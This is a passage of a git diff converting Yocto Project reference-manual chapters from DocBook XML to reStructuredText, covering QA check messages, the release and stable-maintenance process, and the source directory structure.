- turn into <filename>FILES = "xyz"</filename>.
- Rename your recipe (or if <filename>PN</filename> is being
- set explicitly, change the <filename>PN</filename> value) so
- that the conflict does not occur.
- See
- <link linkend='var-FILES'><filename>FILES</filename></link>
- for additional information.
- </para>
-
- <para>
- &nbsp;
- </para>
- </listitem>
- </itemizedlist>
- </para>
-
- <para>
- <itemizedlist>
- <listitem>
- <para id='qa-issue-pkgvarcheck'>
- <code>
- &lt;recipefile&gt;: Variable &lt;variable&gt; is set as not being package specific, please fix this. [pkgvarcheck]
- </code>
- </para>
-
- <para>
- Certain variables
- (<link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link>,
- <link linkend='var-RRECOMMENDS'><filename>RRECOMMENDS</filename></link>,
- <link linkend='var-RSUGGESTS'><filename>RSUGGESTS</filename></link>,
- <link linkend='var-RCONFLICTS'><filename>RCONFLICTS</filename></link>,
- <link linkend='var-RPROVIDES'><filename>RPROVIDES</filename></link>,
- <link linkend='var-RREPLACES'><filename>RREPLACES</filename></link>,
- <link linkend='var-FILES'><filename>FILES</filename></link>,
- <filename>pkg_preinst</filename>,
- <filename>pkg_postinst</filename>,
- <filename>pkg_prerm</filename>,
- <filename>pkg_postrm</filename>, and
- <link linkend='var-ALLOW_EMPTY'><filename>ALLOW_EMPTY</filename></link>)
- should always be set specific to a package (i.e. they
- should be set with a package name override such as
- <filename>RDEPENDS_${PN} = "value"</filename> rather than
- <filename>RDEPENDS = "value"</filename>).
- If you receive this error, correct any assignments to these
- variables within your recipe.
- </para>
-
- <para>
- &nbsp;
- </para>
- </listitem>
- </itemizedlist>
- </para>
-
- <para>
- <itemizedlist>
- <listitem>
- <para id='qa-issue-already-stripped'>
- <code>
- File '&lt;file&gt;' from &lt;recipename&gt; was already stripped, this will prevent future debugging! [already-stripped]
- </code>
- </para>
-
- <para>
- Produced binaries have already been stripped prior to the
- build system extracting debug symbols.
- It is common for upstream software projects to default to
- stripping debug symbols for output binaries.
- In order for debugging to work on the target using
- <filename>-dbg</filename> packages, this stripping must be
- disabled.
- </para>
-
- <para>
- Depending on the build system used by the software being
- built, disabling this stripping could be as easy as
- specifying an additional configure option.
- If not, disabling stripping might involve patching
- the build scripts.
- In the latter case, look for references to "strip" or
- "STRIP", or the "-s" or "-S" command-line options being
- specified on the linker command line (possibly
- through the compiler command line if preceded with "-Wl,").
- <note>
- Disabling stripping here does not mean that the final
- packaged binaries will be unstripped.
- Once the OpenEmbedded build system splits out debug
- symbols to the <filename>-dbg</filename> package,
- it will then strip the symbols from the binaries.
- </note>
- </para>
-
- <para>
- &nbsp;
- </para>
- </listitem>
- </itemizedlist>
- </para>
-
- <para>
- <itemizedlist>
- <listitem>
- <para id='qa-issue-packages-list'>
- <code>
- &lt;packagename&gt; is listed in PACKAGES multiple times, this leads to packaging errors. [packages-list]
- </code>
- </para>
-
- <para>
- Package names must appear only once in the
- <link linkend='var-PACKAGES'><filename>PACKAGES</filename></link>
- variable.
- You might receive this error if you are attempting to add a
- package to <filename>PACKAGES</filename> that is
- already in the variable's value.
- </para>
-
- <para>
- &nbsp;
- </para>
- </listitem>
- </itemizedlist>
- </para>
-
- <para>
- <itemizedlist>
- <listitem>
- <para id='qa-issue-files-invalid'>
- <code>
- FILES variable for package &lt;packagename&gt; contains '//' which is invalid. Attempting to fix this but you should correct the metadata. [files-invalid]
- </code>
- </para>
-
- <para>
- The string "//" is invalid in a Unix path.
- Correct all occurrences where this string appears in a
- <link linkend='var-FILES'><filename>FILES</filename></link>
- variable so that there is only a single "/".
- </para>
-
- <para>
- &nbsp;
- </para>
- </listitem>
- </itemizedlist>
- </para>
-
- <para>
- <itemizedlist>
- <listitem>
- <para id='qa-issue-installed-vs-shipped'>
- <code>
- &lt;recipename&gt;: Files/directories were installed but not shipped in any package [installed-vs-shipped]
- </code>
- </para>
-
- <para>
- Files have been installed within the
- <link linkend='ref-tasks-install'><filename>do_install</filename></link>
- task but have not been included in any package by way of the
- <link linkend='var-FILES'><filename>FILES</filename></link>
- variable.
- Files that do not appear in any package cannot be present in
- an image later on in the build process.
- You need to do one of the following:
- <itemizedlist>
- <listitem><para>
- Add the files to <filename>FILES</filename> for the
- package you want them to appear in (e.g.
- <filename>FILES_${</filename><link linkend='var-PN'><filename>PN</filename></link><filename>}</filename> for the main
- package).
- </para></listitem>
- <listitem><para>
- Delete the files at the end of the
- <filename>do_install</filename> task if the files
- are not needed in any package.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- &nbsp;
- </para>
- </listitem>
- </itemizedlist>
- </para>
-
- <para>
- <itemizedlist>
- <listitem>
- <para id='qa-issue-old-and-new-package-and-version-names'>
- <code>
- &lt;oldpackage&gt;-&lt;oldpkgversion&gt; was registered as shlib provider for &lt;library&gt;, changing it to &lt;newpackage&gt;-&lt;newpkgversion&gt; because it was built later
- </code>
- </para>
-
- <para>
- This message means that both
- <filename>&lt;oldpackage&gt;</filename> and
- <filename>&lt;newpackage&gt;</filename> provide the specified
- shared library.
- You can expect this message when a recipe has been renamed.
- However, if that is not the case, the message might indicate
- that a private version of a library is being erroneously
- picked up as the provider for a common library.
- If that is the case, you should add the library's
- <filename>.so</filename> file name to
- <link linkend='var-PRIVATE_LIBS'><filename>PRIVATE_LIBS</filename></link>
- in the recipe that provides
- the private version of the library.
- </para>
- </listitem>
- </itemizedlist>
- </para>
-</section>
-
-<section id='configuring-and-disabling-qa-checks'>
- <title>Configuring and Disabling QA Checks</title>
-
- <para>
- You can configure the QA checks globally so that specific check
- failures either raise a warning or an error message, using the
- <link linkend='var-WARN_QA'><filename>WARN_QA</filename></link> and
- <link linkend='var-ERROR_QA'><filename>ERROR_QA</filename></link>
- variables, respectively.
- You can also disable checks within a particular recipe using
- <link linkend='var-INSANE_SKIP'><filename>INSANE_SKIP</filename></link>.
- For information on how to work with the QA checks, see the
- "<link linkend='ref-classes-insane'><filename>insane.bbclass</filename></link>"
- section.
- <note><title>Tip</title>
- Please keep in mind that the QA checks exist in order to
- detect real or potential problems in the packaged output.
- So exercise caution when disabling these checks.
- </note>
- </para>
-</section>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/ref-manual/ref-release-process.rst b/documentation/ref-manual/ref-release-process.rst
new file mode 100644
index 0000000000..8dcbea7beb
--- /dev/null
+++ b/documentation/ref-manual/ref-release-process.rst
@@ -0,0 +1,191 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+*****************************************************
+Yocto Project Releases and the Stable Release Process
+*****************************************************
+
+The Yocto Project release process is predictable and consists of both
+major and minor (point) releases. This brief chapter provides
+information on how releases are named, their life cycle, and their
+stability.
+
+Major and Minor Release Cadence
+===============================
+
+The Yocto Project delivers major releases (e.g. DISTRO) using a six
+month cadence roughly timed each April and October of the year.
+Following are examples of some major YP releases with their codenames
+also shown. See the "`Major Release
+Codenames <#major-release-codenames>`__" section for information on
+codenames used with major releases.
+
+ - 2.2 (Morty)
+ - 2.1 (Krogoth)
+ - 2.0 (Jethro)
+
+While the cadence is never perfect, this timescale facilitates
+regular releases that have strong QA cycles while not overwhelming users
+with too many new releases. The cadence is predictable and avoids many
+major holidays in various geographies.
+
+The Yocto project delivers minor (point) releases on an unscheduled
+basis and are usually driven by the accumulation of enough significant
+fixes or enhancements to the associated major release. Following are
+some example past point releases:
+
+ - 2.1.1
+ - 2.1.2
+ - 2.2.1
+
+The point release
+indicates a point in the major release branch where a full QA cycle and
+release process validates the content of the new branch.
+
+.. note::
+
+ Realize that there can be patches merged onto the stable release
+ branches as and when they become available.
+
+Major Release Codenames
+=======================
+
+Each major release receives a codename that identifies the release in
+the :ref:`overview-manual/overview-manual-development-environment:yocto project source repositories`.
+The concept is that branches of :term:`Metadata` with the same
+codename are likely to be compatible and thus work together.
+
+.. note::
+
+ Codenames are associated with major releases because a Yocto Project
+ release number (e.g. DISTRO) could conflict with a given layer or
+ company versioning scheme. Codenames are unique, interesting, and
+ easily identifiable.
+
+Releases are given a nominal release version as well but the codename is
+used in repositories for this reason. You can find information on Yocto
+Project releases and codenames at
+:yocto_wiki:`/wiki/Releases`.
+
+Stable Release Process
+======================
+
+Once released, the release enters the stable release process at which
+time a person is assigned as the maintainer for that stable release.
+This maintainer monitors activity for the release by investigating and
+handling nominated patches and backport activity. Only fixes and
+enhancements that have first been applied on the "master" branch (i.e.
+the current, in-development branch) are considered for backporting to a
+stable release.
+
+.. note::
+
+ The current Yocto Project policy regarding backporting is to consider
+ bug fixes and security fixes only. Policy dictates that features are
+ not backported to a stable release. This policy means generic recipe
+ version upgrades are unlikely to be accepted for backporting. The
+ exception to this policy occurs when a strong reason exists such as
+ the fix happens to also be the preferred upstream approach.
+
+Stable release branches have strong maintenance for about a year after
+their initial release. Should significant issues be found for any
+release regardless of its age, fixes could be backported to older
+releases. For issues that are not backported given an older release,
+Community LTS trees and branches exist where community members share
+patches for older releases. However, these types of patches do not go
+through the same release process as do point releases. You can find more
+information about stable branch maintenance at
+:yocto_wiki:`/wiki/Stable_branch_maintenance`.
+
+Testing and Quality Assurance
+=============================
+
+Part of the Yocto Project development and release process is quality
+assurance through the execution of test strategies. Test strategies
+provide the Yocto Project team a way to ensure a release is validated.
+Additionally, because the test strategies are visible to you as a
+developer, you can validate your projects. This section overviews the
+available test infrastructure used in the Yocto Project. For information
+on how to run available tests on your projects, see the
+":ref:`dev-manual/dev-manual-common-tasks:performing automated runtime testing`"
+section in the Yocto Project Development Tasks Manual.
+
+The QA/testing infrastructure is woven into the project to the point
+where core developers take some of it for granted. The infrastructure
+consists of the following pieces:
+
+- ``bitbake-selftest``: A standalone command that runs unit tests on
+ key pieces of BitBake and its fetchers.
+
+- :ref:`sanity.bbclass <ref-classes-sanity>`: This automatically
+ included class checks the build environment for missing tools (e.g.
+ ``gcc``) or common misconfigurations such as
+ :term:`MACHINE` set incorrectly.
+
+- :ref:`insane.bbclass <ref-classes-insane>`: This class checks the
+ generated output from builds for sanity. For example, if building for
+ an ARM target, did the build produce ARM binaries. If, for example,
+ the build produced PPC binaries then there is a problem.
+
+- :ref:`testimage.bbclass <ref-classes-testimage*>`: This class
+ performs runtime testing of images after they are built. The tests
+ are usually used with :doc:`QEMU <../dev-manual/dev-manual-qemu>`
+ to boot the images and check the combined runtime result boot
+ operation and functions. However, the test can also use the IP
+ address of a machine to test.
+
+- :ref:`ptest <dev-manual/dev-manual-common-tasks:testing packages with ptest>`:
+ Runs tests against packages produced during the build for a given
+ piece of software. The test allows the packages to be be run within a
+ target image.
+
+- ``oe-selftest``: Tests combinations of BitBake invocations. These tests
+ operate outside the OpenEmbedded build system itself. The
+ ``oe-selftest`` can run all tests by default or can run selected
+ tests or test suites.
+
+ .. note::
+
+ Running ``oe-selftest`` requires host packages beyond the "Essential"
+ grouping. See the :ref:`ref-manual/ref-system-requirements:required packages for the build host`
+ section for more information.
+
+Originally, much of this testing was done manually. However, significant
+effort has been made to automate the tests so that more people can use
+them and the Yocto Project development team can run them faster and more
+efficiently.
+
+The Yocto Project's main Autobuilder (&YOCTO_AB_URL;)
+publicly tests each Yocto Project release's code in the
+:term:`OpenEmbedded-Core (OE-Core)`, Poky, and BitBake repositories. The testing
+occurs for both the current state of the "master" branch and also for
+submitted patches. Testing for submitted patches usually occurs in the
+"ross/mut" branch in the ``poky-contrib`` repository (i.e. the
+master-under-test branch) or in the "master-next" branch in the ``poky``
+repository.
+
+.. note::
+
+ You can find all these branches in the Yocto Project
+ Source Repositories
+ .
+
+Testing within these public branches ensures in a publicly visible way
+that all of the main supposed architectures and recipes in OE-Core
+successfully build and behave properly.
+
+Various features such as ``multilib``, sub architectures (e.g. ``x32``,
+``poky-tiny``, ``musl``, ``no-x11`` and and so forth),
+``bitbake-selftest``, and ``oe-selftest`` are tested as part of the QA
+process of a release. Complete testing and validation for a release
+takes the Autobuilder workers several hours.
+
+.. note::
+
+ The Autobuilder workers are non-homogeneous, which means regular
+ testing across a variety of Linux distributions occurs. The
+ Autobuilder is limited to only testing QEMU-based setups and not real
+ hardware.
+
+Finally, in addition to the Autobuilder's tests, the Yocto Project QA
+team also performs testing on a variety of platforms, which includes
+actual hardware, to ensure expected results.
diff --git a/documentation/ref-manual/ref-release-process.xml b/documentation/ref-manual/ref-release-process.xml
deleted file mode 100644
index 5efe17417a..0000000000
--- a/documentation/ref-manual/ref-release-process.xml
+++ /dev/null
@@ -1,255 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='ref-release-process'>
-<title>Yocto Project Releases and the Stable Release Process</title>
-
-<para>
- The Yocto Project release process is predictable and consists of both
- major and minor (point) releases.
- This brief chapter provides information on how releases are named, their
- life cycle, and their stability.
-</para>
-
-<section id='major-and-minor-release-cadence'>
- <title>Major and Minor Release Cadence</title>
-
- <para>
- The Yocto Project delivers major releases (e.g. &DISTRO;) using a six
- month cadence roughly timed each April and October of the year.
- Following are examples of some major YP releases with their codenames
- also shown.
- See the
- "<link linkend='major-release-codenames'>Major Release Codenames</link>"
- section for information on codenames used with major releases.
- <literallayout class='monospaced'>
- 2.2 (Morty)
- 2.1 (Krogoth)
- 2.0 (Jethro)
- </literallayout>
- While the cadence is never perfect, this timescale facilitates
- regular releases that have strong QA cycles while not overwhelming
- users with too many new releases.
- The cadence is predictable and avoids many major holidays in various
- geographies.
- </para>
-
- <para>
- The Yocto project delivers minor (point) releases on an unscheduled
- basis and are usually driven by the accumulation of enough significant
- fixes or enhancements to the associated major release.
- Following are some example past point releases:
- <literallayout class='monospaced'>
- 2.1.1
- 2.1.2
- 2.2.1
- </literallayout>
- The point release indicates a point in the major release branch where
- a full QA cycle and release process validates the content of the new
- branch.
- <note>
- Realize that there can be patches merged onto the stable release
- branches as and when they become available.
- </note>
- </para>
-</section>
-
-<section id='major-release-codenames'>
- <title>Major Release Codenames</title>
-
- <para>
- Each major release receives a codename that identifies the release in
- the
- <ulink url='&YOCTO_DOCS_OM_URL;#yocto-project-repositories'>Yocto Project Source Repositories</ulink>.
- The concept is that branches of
- <link linkend='metadata'>Metadata</link>
- with the same codename are likely to be compatible and thus
- work together.
- <note>
- Codenames are associated with major releases because a Yocto
- Project release number (e.g. &DISTRO;) could conflict with
- a given layer or company versioning scheme.
- Codenames are unique, interesting, and easily identifiable.
- </note>
- Releases are given a nominal release version as well but the codename
- is used in repositories for this reason.
- You can find information on Yocto Project releases and codenames at
- <ulink url='https://wiki.yoctoproject.org/wiki/Releases'></ulink>.
- </para>
-</section>
-
-<section id='stable-release-process'>
- <title>Stable Release Process</title>
-
- <para>
- Once released, the release enters the stable release process at which
- time a person is assigned as the maintainer for that stable release.
- This maintainer monitors activity for the release by investigating
- and handling nominated patches and backport activity.
- Only fixes and enhancements that have first been applied on the
- "master" branch (i.e. the current, in-development branch) are
- considered for backporting to a stable release.
- <note>
- The current Yocto Project policy regarding backporting is to
- consider bug fixes and security fixes only.
- Policy dictates that features are not backported to a stable
- release.
- This policy means generic recipe version upgrades are unlikely to
- be accepted for backporting.
- The exception to this policy occurs when a strong reason exists
- such as the fix happens to also be the preferred upstream approach.
- </note>
- </para>
-
- <para>
- Stable release branches have strong maintenance for about a year after
- their initial release.
- Should significant issues be found for any release regardless of its
- age, fixes could be backported to older releases.
- For issues that are not backported given an older release,
- Community LTS trees and branches exist where
- community members share patches for older releases.
- However, these types of patches do not go through the same release
- process as do point releases.
- You can find more information about stable branch maintenance at
- <ulink url='https://wiki.yoctoproject.org/wiki/Stable_branch_maintenance'></ulink>.
- </para>
-</section>
-
-<section id='testing-and-quality-assurance'>
- <title>Testing and Quality Assurance</title>
-
- <para>
- Part of the Yocto Project development and release process is quality
- assurance through the execution of test strategies.
- Test strategies provide the Yocto Project team a way to ensure a
- release is validated.
- Additionally, because the test strategies are visible to you as a
- developer, you can validate your projects.
- This section overviews the available test infrastructure used in the
- Yocto Project.
- For information on how to run available tests on your projects, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#performing-automated-runtime-testing'>Performing Automated Runtime Testing</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
-
- <para>
- The QA/testing infrastructure is woven into the project to the point
- where core developers take some of it for granted.
- The infrastructure consists of the following pieces:
- <itemizedlist>
- <listitem><para>
- <filename>bitbake-selftest</filename>:
- A standalone command that runs unit tests on key pieces of
- BitBake and its fetchers.
- </para></listitem>
- <listitem><para>
- <link linkend='ref-classes-sanity'><filename>sanity.bbclass</filename></link>:
- This automatically included class checks the build environment
- for missing tools (e.g. <filename>gcc</filename>) or common
- misconfigurations such as
- <link linkend='var-MACHINE'><filename>MACHINE</filename></link>
- set incorrectly.
- </para></listitem>
- <listitem><para>
- <link linkend='ref-classes-insane'><filename>insane.bbclass</filename></link>:
- This class checks the generated output from builds for sanity.
- For example, if building for an ARM target, did the build
- produce ARM binaries.
- If, for example, the build produced PPC binaries then there
- is a problem.
- </para></listitem>
- <listitem><para>
- <link linkend='ref-classes-testimage*'><filename>testimage.bbclass</filename></link>:
- This class performs runtime testing of images after they are
- built.
- The tests are usually used with
- <ulink url='&YOCTO_DOCS_DEV_URL;#dev-manual-qemu'>QEMU</ulink>
- to boot the images and check the combined runtime result
- boot operation and functions.
- However, the test can also use the IP address of a machine to
- test.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_DEV_URL;#testing-packages-with-ptest'><filename>ptest</filename></ulink>:
- Runs tests against packages produced during the build for a
- given piece of software.
- The test allows the packages to be be run within a target
- image.
- </para></listitem>
- <listitem><para>
- <filename>oe-selftest</filename>:
- Tests combination BitBake invocations.
- These tests operate outside the OpenEmbedded build system
- itself.
- The <filename>oe-selftest</filename> can run all tests by
- default or can run selected tests or test suites.
- <note>
- Running <filename>oe-selftest</filename> requires
- host packages beyond the "Essential" grouping.
- See the
- "<link linkend='required-packages-for-the-build-host'>Required Packages for the Build Host</link>"
- section for more information.
- </note>
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- Originally, much of this testing was done manually.
- However, significant effort has been made to automate the tests so
- that more people can use them and the Yocto Project development team
- can run them faster and more efficiently.
- </para>
-
- <para>
- The Yocto Project's main Autobuilder
- (<filename>autobuilder.yoctoproject.org</filename>) publicly tests
- each Yocto Project release's code in the
- <link linkend='oe-core'>OE-Core</link>, Poky, and BitBake
- repositories.
- The testing occurs for both the current state of the
- "master" branch and also for submitted patches.
- Testing for submitted patches usually occurs in the
- "ross/mut" branch in the <filename>poky-contrib</filename> repository
- (i.e. the master-under-test branch) or in the "master-next" branch
- in the <filename>poky</filename> repository.
- <note>
- You can find all these branches in the Yocto Project
- <ulink url='&YOCTO_DOCS_OM_URL;#source-repositories'>Source Repositories</ulink>.
- </note>
- Testing within these public branches ensures in a publicly visible way
- that all of the main supposed architectures and recipes in OE-Core
- successfully build and behave properly.
- </para>
-
- <para>
- Various features such as <filename>multilib</filename>, sub
- architectures (e.g. <filename>x32</filename>,
- <filename>poky-tiny</filename>, <filename>musl</filename>,
- <filename>no-x11</filename> and and so forth),
- <filename>bitbake-selftest</filename>, and
- <filename>oe-selftest</filename> are tested as part of
- the QA process of a release.
- Complete testing and validation for a release takes the Autobuilder
- workers several hours.
- <note>
- The Autobuilder workers are non-homogeneous, which means regular
- testing across a variety of Linux distributions occurs.
- The Autobuilder is limited to only testing QEMU-based setups and
- not real hardware.
- </note>
- </para>
-
- <para>
- Finally, in addition to the Autobuilder's tests, the Yocto Project
- QA team also performs testing on a variety of platforms, which includes
- actual hardware, to ensure expected results.
- </para>
-</section>
-
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/ref-manual/ref-structure.rst b/documentation/ref-manual/ref-structure.rst
new file mode 100644
index 0000000000..db1ea97979
--- /dev/null
+++ b/documentation/ref-manual/ref-structure.rst
@@ -0,0 +1,874 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+**************************
+Source Directory Structure
+**************************
+
+The :term:`Source Directory` consists of numerous files,
+directories and subdirectories; understanding their locations and
+contents is key to using the Yocto Project effectively. This chapter
+describes the Source Directory and gives information about those files
+and directories.
+
+For information on how to establish a local Source Directory on your
+development system, see the
+":ref:`dev-manual/dev-manual-start:locating yocto project source files`"
+section in the Yocto Project Development Tasks Manual.
+
+.. note::
+
+ The OpenEmbedded build system does not support file or directory
+ names that contain spaces. Be sure that the Source Directory you use
+ does not contain these types of names.
+
+.. _structure-core:
+
+Top-Level Core Components
+=========================
+
+This section describes the top-level components of the :term:`Source Directory`.
+
+.. _structure-core-bitbake:
+
+``bitbake/``
+------------
+
+This directory includes a copy of BitBake for ease of use. The copy
+usually matches the current stable BitBake release from the BitBake
+project. BitBake, a :term:`Metadata` interpreter, reads the
+Yocto Project Metadata and runs the tasks defined by that data. Failures
+are usually caused by errors in your Metadata and not from BitBake
+itself; consequently, most users do not need to worry about BitBake.
+
+When you run the ``bitbake`` command, the main BitBake executable (which
+resides in the ``bitbake/bin/`` directory) starts. Sourcing the
+environment setup script (i.e. :ref:`structure-core-script`) places
+the ``scripts/`` and ``bitbake/bin/`` directories (in that order) into
+the shell's ``PATH`` environment variable.
+
+For more information on BitBake, see the :doc:`BitBake User Manual
+<bitbake:index>`.
+
+.. _structure-core-build:
+
+``build/``
+----------
+
+This directory contains user configuration files and the output
+generated by the OpenEmbedded build system in its standard configuration
+where the source tree is combined with the output. The :term:`Build Directory`
+is created initially when you ``source``
+the OpenEmbedded build environment setup script (i.e.
+:ref:`structure-core-script`).
+
+It is also possible to place output and configuration files in a
+directory separate from the :term:`Source Directory` by
+providing a directory name when you ``source`` the setup script. For
+information on separating output from your local Source Directory files
+(commonly described as an "out of tree" build), see the
+":ref:`structure-core-script`" section.
+
+.. _handbook:
+
+``documentation/``
+------------------
+
+This directory holds the source for the Yocto Project documentation as
+well as templates and tools that allow you to generate PDF and HTML
+versions of the manuals. Each manual is contained in its own sub-folder;
+for example, the files for this reference manual reside in the
+``ref-manual/`` directory.
+
+.. _structure-core-meta:
+
+``meta/``
+---------
+
+This directory contains the minimal, underlying OpenEmbedded-Core
+metadata. The directory holds recipes, common classes, and machine
+configuration for strictly emulated targets (``qemux86``, ``qemuarm``,
+and so forth.)
+
+.. _structure-core-meta-poky:
+
+``meta-poky/``
+--------------
+
+Designed above the ``meta/`` content, this directory adds just enough
+metadata to define the Poky reference distribution.
+
+.. _structure-core-meta-yocto-bsp:
+
+``meta-yocto-bsp/``
+-------------------
+
+This directory contains the Yocto Project reference hardware Board
+Support Packages (BSPs). For more information on BSPs, see the
+:doc:`../bsp-guide/bsp-guide`.
+
+.. _structure-meta-selftest:
+
+``meta-selftest/``
+------------------
+
+This directory adds additional recipes and append files used by the
+OpenEmbedded selftests to verify the behavior of the build system. You
+do not have to add this layer to your ``bblayers.conf`` file unless you
+want to run the selftests.
+
+.. _structure-meta-skeleton:
+
+``meta-skeleton/``
+------------------
+
+This directory contains template recipes for BSP and kernel development.
+
+.. _structure-core-scripts:
+
+``scripts/``
+------------
+
+This directory contains various integration scripts that implement extra
+functionality in the Yocto Project environment (e.g. QEMU scripts). The
+:ref:`structure-core-script` script prepends this directory to the
+shell's ``PATH`` environment variable.
+
+The ``scripts`` directory has useful scripts that assist in contributing
+back to the Yocto Project, such as ``create-pull-request`` and
+``send-pull-request``.
+
+.. _structure-core-script:
+
+``oe-init-build-env``
+---------------------
+
+This script sets up the OpenEmbedded build environment. Running this
+script with the ``source`` command in a shell makes changes to ``PATH``
+and sets other core BitBake variables based on the current working
+directory. You need to run an environment setup script before running
+BitBake commands. The script uses other scripts within the ``scripts``
+directory to do the bulk of the work.
+
+When you run this script, your Yocto Project environment is set up, a
+:term:`Build Directory` is created, your working
+directory becomes the Build Directory, and you are presented with some
+simple suggestions as to what to do next, including a list of some
+possible targets to build. Here is an example:
+::
+
+ $ source oe-init-build-env
+
+ ### Shell environment set up for builds. ###
+
+ You can now run 'bitbake <target>'
+
+ Common targets are:
+ core-image-minimal
+ core-image-sato
+ meta-toolchain
+ meta-ide-support
+
+ You can also run generated qemu images with a command like 'runqemu qemux86-64'
+
+The default output of the ``oe-init-build-env`` script is from the
+``conf-notes.txt`` file, which is found in the ``meta-poky`` directory
+within the :term:`Source Directory`. If you design a
+custom distribution, you can include your own version of this
+configuration file to mention the targets defined by your distribution.
+See the
+":ref:`dev-manual/dev-manual-common-tasks:creating a custom template configuration directory`"
+section in the Yocto Project Development Tasks Manual for more
+information.
+
+By default, running this script without a Build Directory argument
+creates the ``build/`` directory in your current working directory. If
+you provide a Build Directory argument when you ``source`` the script,
+you direct the OpenEmbedded build system to create a Build Directory of
+your choice. For example, the following command creates a Build
+Directory named ``mybuilds/`` that is outside of the :term:`Source Directory`:
+::
+
+ $ source oe-init-build-env ~/mybuilds
+
+The OpenEmbedded build system uses the template configuration files, which
+are found by default in the ``meta-poky/conf/`` directory in the Source
+Directory. See the
+":ref:`dev-manual/dev-manual-common-tasks:creating a custom template configuration directory`"
+section in the Yocto Project Development Tasks Manual for more
+information.
+
+.. note::
+
+ The OpenEmbedded build system does not support file or directory
+ names that contain spaces. If you attempt to run the ``oe-init-build-env``
+ script from a Source Directory that contains spaces in either the
+ filenames or directory names, the script returns an error indicating
+ no such file or directory. Be sure to use a Source Directory free of
+ names containing spaces.
+
+.. _structure-basic-top-level:
+
+``LICENSE, README, and README.hardware``
+----------------------------------------
+
+These files are standard top-level files.
+
+.. _structure-build:
+
+The Build Directory - ``build/``
+================================
+
+The OpenEmbedded build system creates the :term:`Build Directory`
+when you run the build environment setup
+script :ref:`structure-core-script`. If you do not give the Build
+Directory a specific name when you run the setup script, the name
+defaults to ``build/``.
+
+For subsequent parsing and processing, the name of the Build directory
+is available via the :term:`TOPDIR` variable.
+
+.. _structure-build-buildhistory:
+
+``build/buildhistory/``
+-----------------------
+
+The OpenEmbedded build system creates this directory when you enable
+build history via the ``buildhistory`` class file. The directory
+organizes build information into image, packages, and SDK
+subdirectories. For information on the build history feature, see the
+":ref:`dev-manual/dev-manual-common-tasks:maintaining build output quality`"
+section in the Yocto Project Development Tasks Manual.
+
+.. _structure-build-conf-local.conf:
+
+``build/conf/local.conf``
+-------------------------
+
+This configuration file contains all the local user configurations for
+your build environment. The ``local.conf`` file contains documentation
+on the various configuration options. Any variable set here overrides
+any variable set elsewhere within the environment unless that variable
+is hard-coded within a file (e.g. by using '=' instead of '?='). Some
+variables are hard-coded for various reasons but such variables are
+relatively rare.
+
+At a minimum, you would normally edit this file to select the target
+``MACHINE``, which package types you wish to use
+(:term:`PACKAGE_CLASSES`), and the location from
+which you want to access downloaded files (``DL_DIR``).
+
+If ``local.conf`` is not present when you start the build, the
+OpenEmbedded build system creates it from ``local.conf.sample`` when you
+``source`` the top-level build environment setup script
+:ref:`structure-core-script`.
+
+The source ``local.conf.sample`` file used depends on the
+``$TEMPLATECONF`` script variable, which defaults to ``meta-poky/conf/``
+when you are building from the Yocto Project development environment,
+and to ``meta/conf/`` when you are building from the OpenEmbedded-Core
+environment. Because the script variable points to the source of the
+``local.conf.sample`` file, this implies that you can configure your
+build environment from any layer by setting the variable in the
+top-level build environment setup script as follows:
+::
+
+ TEMPLATECONF=your_layer/conf
+
+Once the build process gets the sample
+file, it uses ``sed`` to substitute final
+``${``\ :term:`OEROOT`\ ``}`` values for all
+``##OEROOT##`` values.
+
+.. note::
+
+ You can see how the ``TEMPLATECONF`` variable is used by looking at the
+ ``scripts/oe-setup-builddir``` script in the :term:`Source Directory`.
+ You can find the Yocto Project version of the ``local.conf.sample`` file in
+ the ``meta-poky/conf`` directory.
+
+.. _structure-build-conf-bblayers.conf:
+
+``build/conf/bblayers.conf``
+----------------------------
+
+This configuration file defines
+:ref:`layers <dev-manual/dev-manual-common-tasks:understanding and creating layers>`,
+which are directory trees, traversed (or walked) by BitBake. The
+``bblayers.conf`` file uses the :term:`BBLAYERS`
+variable to list the layers BitBake tries to find.
+
+If ``bblayers.conf`` is not present when you start the build, the
+OpenEmbedded build system creates it from ``bblayers.conf.sample`` when
+you ``source`` the top-level build environment setup script (i.e.
+:ref:`structure-core-script`).
+
+As with the ``local.conf`` file, the source ``bblayers.conf.sample``
+file used depends on the ``$TEMPLATECONF`` script variable, which
+defaults to ``meta-poky/conf/`` when you are building from the Yocto
+Project development environment, and to ``meta/conf/`` when you are
+building from the OpenEmbedded-Core environment. Because the script
+variable points to the source of the ``bblayers.conf.sample`` file, this
+implies that you can base your build from any layer by setting the
+variable in the top-level build environment setup script as follows:
+::
+
+ TEMPLATECONF=your_layer/conf
+
+Once the build process gets the sample file, it uses ``sed`` to substitute final
+``${``\ :term:`OEROOT`\ ``}`` values for all ``##OEROOT##`` values.
+
+.. note::
+
+ You can see how the ``TEMPLATECONF`` variable ``scripts/oe-setup-builddir``
+ script in the :term:`Source Directory`. You can find the Yocto Project
+ version of the ``bblayers.conf.sample`` file in the ``meta-poky/conf/``
+ directory.
+
+.. _structure-build-conf-sanity_info:
+
+``build/cache/sanity_info``
+---------------------------
+
+This file indicates the state of the sanity checks and is created during
+the build.
+
+.. _structure-build-downloads:
+
+``build/downloads/``
+--------------------
+
+This directory contains downloaded upstream source tarballs. You can
+reuse the directory for multiple builds or move the directory to another
+location. You can control the location of this directory through the
+``DL_DIR`` variable.
+
+.. _structure-build-sstate-cache:
+
+``build/sstate-cache/``
+-----------------------
+
+This directory contains the shared state cache. You can reuse the
+directory for multiple builds or move the directory to another location.
+You can control the location of this directory through the
+``SSTATE_DIR`` variable.
+
+.. _structure-build-tmp:
+
+``build/tmp/``
+--------------
+
+The OpenEmbedded build system creates and uses this directory for all
